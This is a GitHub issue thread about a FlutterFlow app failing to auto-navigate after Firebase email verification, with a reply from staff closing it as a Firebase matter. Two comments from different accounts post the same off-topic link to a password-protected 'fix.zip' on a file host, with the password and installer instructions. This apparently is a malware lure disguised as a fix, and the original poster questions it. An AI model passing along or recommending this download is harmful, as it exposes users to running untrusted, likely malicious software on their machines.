### ISSUE TITLE
Unable to auto-navigate to next page after verification

### ISSUE THREAD

**Issue by plannedlivingjournal** [FlutterFlow/flutterflow-issues#3690]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

![image](https://github.com/user-attachments/assets/efddc0b1-a869-45c9-8db2-10daec45fad8)

I want the app to auto-navigate to 'Successful Verification' page once the email verification is done. I am using Firebase email verification services. Once, I click on verify the link, the user is created on Firebase, however the app screen doesn't navigate to successful verification page.

Kindly help!

### Expected Behavior

1) User enters email ID, password and confirms password
2) The user clicks on 'Create Account'
3) A pop-up is shown informing user about verification link send on email ID
4) User confirms email ID by clicking on the link
5) Once verified, app screen should auto-transition to 'Successfully verified' page.

### Steps to Reproduce

You can test the same using the prototype created.

### Reproducible from Blank

- [ ] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

IT4olsn15YVPj7xE7q6JccBKjSQsQno/U50vispOGDwbfaKvPIlzac7RPlpCOfXhd1VtKEWIpEEDw+zXkvPqUPlcExKrfLZgz7liWAvKLWO/aoSIO5GSdHdQTOFQIXa10LazsyZ+NtptWHNm22a6GuyuTnbdHuL7Zwh9f6PHaOI=

### Visual documentation

![image](https://github.com/user-attachments/assets/24b4c84d-4c94-4347-86e9-021cfcfc01e0)

### Environment

```markdown
- FlutterFlow version: 3.22.2
- Platform: Web
- Browser name and version: Google chrome 128.0.6613.85 
- Operating system and version affected: Windows 10
```

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by plannedlivingjournal** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

But what is this? What problem does it solve?

**Comment by Alezanello** [comment]
Hi there!

The verification page you see after verifying your email is a Firebase webpage, not a FlutterFlow one, so we don't have control over its behavior. I recommend checking the Firebase documentation to see if there's a way to achieve what you're looking for. Since this is related to Firebase and not a FlutterFlow issue, I'll go ahead and close this ticket.

**Comment by plannedlivingjournal** [comment]
Hi @Alezanello,

Thanks for your reply!

While I understand that verification page is from Firebase, however, I believe that status must be getting stored in Firebase and passed to FlutterFlow given the project and DB is on Firebase. Moreover, there are authenticated user paramaters like 'Email Verified' which is when the action is being defined. 

Can you please guide if values are being passed to these parameters and hence conditional actions can be applied?


![image](https://github.com/user-attachments/assets/248da15f-8504-476b-a38c-9fae0587ae15)
